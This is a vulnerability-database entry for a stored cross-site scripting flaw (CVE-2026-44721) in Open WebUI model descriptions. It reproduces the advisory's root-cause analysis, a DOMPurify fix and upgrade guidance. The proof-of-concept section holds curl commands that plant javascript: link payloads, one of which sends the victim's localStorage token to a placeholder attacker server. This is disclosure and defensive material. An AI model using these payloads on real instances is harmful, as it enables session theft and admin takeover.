Skip to main content

Open WebUI EUVDEUVD-2026-30625

| CVE-2026-44721 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-05-08 https://github.com/open-webui/open-webui GHSA-gf5m-wcrh-7928
7.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.3 HIGH
AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 08, 2026 - 19:30 vuln.today
Analysis Generated
May 08, 2026 - 19:30 vuln.today
CVE Published
May 08, 2026 - 19:00 nvd
HIGH 7.3

DescriptionGitHub Advisory

> [!IMPORTANT] > Relationship to CVE-2024-7990

> CVE-2024-7990 (issued by huntr.dev, March 2025) describes a stored XSS in the same field - the model description - but exploits a different bypass mechanism: a second-order injection through the sanitizeResponseContent function's video-tag placeholder restoration logic in v0.3.x. That bypass was closed in v0.4.0 by removing the video exemption from the sanitizer.

The vulnerability described in this advisory is structurally distinct: a markdown-link payload with a javascript: URI passes through sanitizeResponseContent unchanged (no angle brackets), is then parsed by marked.parse() into an <a href="javascript:..."> element, and rendered live by {@html}. This is a pipeline-ordering flaw where the dangerous construct is introduced after sanitization completes. Removing the video exemption has no effect on this primitive.

Affected range: v0.3.5 through v0.8.12 inclusive. Fixed in: v0.9.0 (commit 5eab125, which wraps marked.parse() output in DOMPurify.sanitize).

Both vulnerabilities are independently fixable under CVE rule 4.2.11. CVE assignment for this advisory has been requested separately on that basis.

Summary

This is a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI.

Details

Root Cause: Model descriptions are rendered in two Svelte components via this chain: sanitizeResponseContent(description) → .replaceAll('\n', '<br>') → marked.parse() → {@html ...}

The model description is stored in the database without prior sanitization. Then uses this sanitization function before applying the results to the description.

index.ts:82-92

ts
export const sanitizeResponseContent = (content: string) => {
    return content
        .replace(/<\|[a-z]*$/, '')       // strip incomplete <|tokens
        .replace(/<\|[a-z]+\|$/, '')     // strip incomplete <|token|
        .replace(/<$/, '')               // strip trailing <
        .replaceAll('<', '&lt;')         // escape < to &lt;
        .replaceAll('>', '&gt;')         // escape > to &gt;
        .replaceAll(/<\|[a-z]+\|>/g, ' ') // strip <|token|> patterns
        .trim();
};

This function was designed to sanitize HTML tags, but does not take into consideration that XSS can be triggered via javascript: which is the fundamental issue.

.replaceAll('\n', '<br>') will replace newlines with <br> tags, and since payload can be written without newlines, its unaffected.

marked sees [text](url) and generated an anchor tag and does not block the payload of javascript:.

Svelte's {@html} directive inserts raw HTML into the DOM without escaping, creating the vulnerability.

Affected files: src/lib/components/chat/Placeholder.svelte (lines 177-181) src/lib/components/chat/ChatPlaceholder.svelte (lines 99-103)

PoC

Below is a simple PoC that will create a model with a description to trigger an alert when pressing on the hyperlink. Replace the values inside such as HOST and TOKEN with your own values using your own test server.

Step 1 - Create a model with a malicious description. The token used must be from an account with either the following. A. Admin privileges B. An account with model creation permission

bash
curl -X POST 'http://<HOST>/api/v1/models/create' \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "id": "xss-test",
    "name": "Helpful Assistant!",
    "base_model_id": "llama3",
    "meta": {
      "description": "A helpful AI assistant. [Click here for docs](javascript:alert())"
    },
    "params": {}
  }'

Any authenticated user with workspace.models permission can execute this. The base_model_id should reference any model available on the instance.

Step 2 - Select the model:

Login and select the created model, if you followed the PoC it will be Helpful Asisstant! <img width="1203" height="718" alt="image" src="https://github.com/user-attachments/assets/d649c727-276c-4011-8234-140c51a32b68" />

Step 3 - XSS Triggers:

Click on the hyperlink and watch the alert trigger. <img width="1203" height="718" alt="image" src="https://github.com/user-attachments/assets/289fc3d4-e09a-45a4-b83d-40984d47a760" />

Below is a PoC that steals the access token from localstorage

Step 1 - Setup a local python HTTPServer

python3 -m http.sever 8080

Step 2 - Create a model with a malicious payload to steal the token from localstorage

bash
curl -X POST 'http://<HOST>/api/v1/models/create' \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "id": "xss-model",
    "name": "Token Stealer",
    "base_model_id": "llama3",
    "meta": {
      "description": "Advanced research model. [View benchmarks](javascript:void(fetch(`http://<MALICIOUS_SERVER_IP>:8080/?t=${localStorage.token}`)))"
    },
    "params": {}
  }'

Step 3 - Navigate to the malicious model and click on the hyperlink

Check on the local server you have set up in Step 1 and see that the token is returned within the URL. <img width="669" height="50" alt="image" src="https://github.com/user-attachments/assets/7933e855-cc0a-40f5-a443-5c0363b1b8fa" />

Impact

As user's session is stored in LocalStorage, attacker can craft a malicious payload that reads the contents and sends it to their malicious server. Once an admin access token has been stolen, users can create a new tool to execute arbitrary code (feature of Open-WebUI).

Attack Scenario

1. Attacker creates a model with a malicious description
2. Victim selects model and clicks the hyperlink
3. Victim authorization token is stolen

This vulnerability affects all Open-WebUI users.

Remediation

Recommended fix - wrap marked.parse() output with DOMPurify.sanitize().

In the affected files, change

ts
{@html marked.parse(
    sanitizeResponseContent(description).replaceAll('\n', '<br>')
)}

into

ts
{@html DOMPurify.sanitize(
    marked.parse(
        sanitizeResponseContent(description).replaceAll('\n', '<br>')
    )
)}

This matches the pattern already used in other parts of the application such as but not limiting to ConfirmDialog.svelte:130 and NotebookView.svelte:77. DOMPurify will handle the stripping of javascript: URIs, event handlers and other dangerous HTML by default.

AI Disclosure

Claude was used to assist in:

Systematic codebase searching to identify unsanitized {@html} rendering paths Verifying marked@9.1.6 behavior with javascript: URIs

Credits

Lin, WeiChi from Sompo Holdings, Inc.

AnalysisAI

Stored cross-site scripting in Open WebUI versions 0.3.5 through 0.8.12 allows authenticated users with model creation permission to inject malicious JavaScript via markdown-link payloads in model descriptions. Attackers craft markdown links with javascript: URIs (e.g., [text](javascript:alert())) that bypass sanitization, are parsed into executable anchor tags by marked.parse(), and rendered unsafely via Svelte's {@html} directive. Successful exploitation enables session token theft from localStorage and full account takeover of admins and other users who view the malicious model in the chat UI. This represents a pipeline-ordering flaw distinct from CVE-2024-7990, which exploited a video-tag restoration logic removed in v0.4.0. Fix confirmed in v0.9.0 (commit 5eab125) via DOMPurify post-processing. EPSS data not provided; CVSS 7.3 reflects network attack vector with low complexity but required authentication and user interaction, limiting automated exploitation.

Technical ContextAI

Open WebUI is a Python/npm web application for AI model interaction with a Svelte-based frontend. The vulnerability stems from a template injection chain in the model description rendering pipeline. User-supplied markdown content passes through sanitizeResponseContent() (which only escapes angle brackets), undergoes newline-to-<br> replacement, is parsed by the marked.js library (v9.1.6) into HTML anchor tags, and finally rendered via Svelte's {@html} directive without further sanitization. The marked library's default configuration permits javascript: URI schemes in links per CommonMark specification. Svelte's {@html} bypasses XSS protections by inserting raw HTML directly into the DOM, equivalent to innerHTML. Affected components are Placeholder.svelte and ChatPlaceholder.svelte. The CPE strings identify both npm (frontend JavaScript package) and PyPI (backend Python package) distributions, indicating a full-stack web application with client-side vulnerability exposure. CWE-79 (Improper Neutralization of Input During Web Page Generation) classifies this as a classic stored XSS where attacker-controlled content persists in the database and executes in victim contexts.

RemediationAI

Upgrade to Open WebUI version 0.9.0 or later, which implements the fix in commit 5eab125 by wrapping marked.parse() output with DOMPurify.sanitize() in affected Svelte components. This mitigation follows the existing pattern used in ConfirmDialog.svelte:130 and NotebookView.svelte:77. Installation via npm: npm update open-webui or via PyPI: pip install --upgrade open-webui. Vendor advisory with upgrade instructions: https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928. If immediate upgrade is not feasible, implement a temporary workaround by restricting workspace.models permission to only highly trusted administrators and audit all existing model descriptions for javascript: URIs using database query: SELECT id, name, meta FROM models WHERE meta->>'description' LIKE '%javascript:%'. Note this workaround reduces attack surface but does not eliminate the vulnerability-malicious insiders with permission can still exploit. Content Security Policy (CSP) with 'unsafe-inline' blocked and no script-src 'unsafe-eval' would prevent javascript: URI execution but may break legitimate Open WebUI functionality that relies on dynamic script evaluation; test thoroughly in staging before production deployment. The CSP mitigation has a functional trade-off and is not vendor-supported.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

EUVD-2026-30625 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy